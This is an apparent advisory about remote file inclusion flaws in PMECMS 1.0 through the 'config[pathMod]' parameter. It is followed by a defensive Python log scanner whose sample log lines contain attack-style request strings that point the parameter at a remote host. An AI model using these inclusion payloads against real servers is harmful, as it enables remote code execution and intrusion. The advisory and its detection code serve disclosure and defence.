vendor: PMECMS
by: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Multiple Remote File Inclusion
Product Name: PMECMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities
PMECMS version 1.0 has multiple remote file inclusion vulnerabilities. An attacker can exploit them by manipulating the 'config[pathMod]' parameter in various module files so that the application includes malicious files from remote servers. This can lead to remote code execution and unauthorized access to sensitive information.
Mitigation:
The vendor has not provided a patch for these vulnerabilities. Users are advised to upgrade to a newer version of PMECMS or implement a web application firewall to filter and block malicious requests.
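The request filtering suggested above can be prototyped as a log check. The following is an added example, not part of the original advisory or of PMECMS: it flags any request that supplies 'config[pathMod]' from the client side and marks those whose value points at a remote scheme. The log lines, the module path `/modules/example_module.php` and the host `example.invalid` are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote

PARAM = "config[pathMod]"  # parameter named in the advisory
# Schemes/wrappers that make a PHP include fetch non-local content.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php|data):|//)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target: str) -> str:
    """Return 'remote', 'override' or 'clean' for one request target."""
    query = target.partition("?")[2].partition("#")[0]
    # parse_qsl percent-decodes names, so config%5BpathMod%5D is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.strip() != PARAM:
            continue
        # Decode again (bounded) in case an upstream layer decodes once.
        for _ in range(3):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        # A path setting should never arrive from the client at all,
        # so even a local-looking value is reported as an override.
        return "remote" if REMOTE.match(value) else "override"
    return "clean"

def scan(lines):
    """Return (verdict, target) for every suspicious access-log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (verdict := classify(m.group(1))) != "clean":
            hits.append((verdict, m.group(1)))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /modules/example_module.php?config[pathMod]=http://example.invalid/x.txt? HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /modules/example_module.php?config%5BpathMod%5D=hTTp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.0" 200 90',
    '198.51.100.8 - - [01/Jan/2007:10:01:00 +0000] "GET /modules/example_module.php?config[pathMod]=../other/ HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:8} {target}")
```

The same two conditions (parameter present, value carrying a scheme) translate directly into a blocking rule for a web application firewall.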